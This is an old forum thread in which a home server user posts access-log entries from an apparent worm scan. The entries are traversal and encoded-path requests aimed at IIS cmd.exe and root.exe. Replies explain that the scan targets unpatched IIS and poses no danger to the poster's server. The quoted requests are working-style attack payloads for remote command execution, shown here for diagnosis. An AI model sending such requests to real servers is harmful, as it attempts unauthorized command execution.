Hacked/Security Flaw?

[jmoschetti45]

I just happened to look in the log file and came across the following mess:

68.124.115.170 - - [13/Feb/2004:23:17:27 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 239 "" ""
68.124.115.170 - - [13/Feb/2004:23:17:28 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 239 "" ""
68.124.115.170 - - [13/Feb/2004:23:17:28 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 239 "" ""
68.124.115.170 - - [13/Feb/2004:23:17:29 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 239 "" ""
68.124.115.170 - - [13/Feb/2004:23:17:29 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 241 "" ""
68.124.115.170 - - [13/Feb/2004:23:17:30 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 241 "" ""
68.124.115.170 - - [13/Feb/2004:23:17:30 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 241 "" ""
68.124.115.170 - - [13/Feb/2004:23:17:31 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 241 "" ""
68.124.115.170 - - [13/Feb/2004:23:17:31 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 239 "" ""
68.124.115.170 - - [13/Feb/2004:23:17:32 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 239 "" ""
68.124.115.170 - - [13/Feb/2004:23:17:32 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 239 "" ""
68.124.115.170 - - [13/Feb/2004:23:17:33 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 239 "" ""
68.124.115.170 - - [13/Feb/2004:23:17:34 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 241 "" ""
68.124.115.170 - - [13/Feb/2004:23:17:34 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 241 "" ""

Thing is I don't have a 'scripts' or 'msadc' folder. It also looks like something was trying to get to cmd.exe. Good thing Win 98 dosen't have it. Does anybody know what happened here?

[Anonymoose]

It's a scan by a worm designed to infect machines running unpatched versions of Microsoft IIS. Even if Windows 98 did have a cmd.exe it wouldn't have been served up by Abyss - the pathnames are designed to target a specific flaw in IIS. The 404 at the end of the line means the file was not found or served to the requesting IP - no danger to you at all, this is pretty much background traffic on the internet now until ISPs finally pull their finger out and start removing internet access from users with infected machines.

[iNaNimAtE]

Yeah, I get these all the time. I really pay no attention because I did the best to secure my server, and I know these attacks are harmless. I suggest you look around for lists of common vulnerabilities, and make sure to "patch up!"
_________________
Bienvenidos!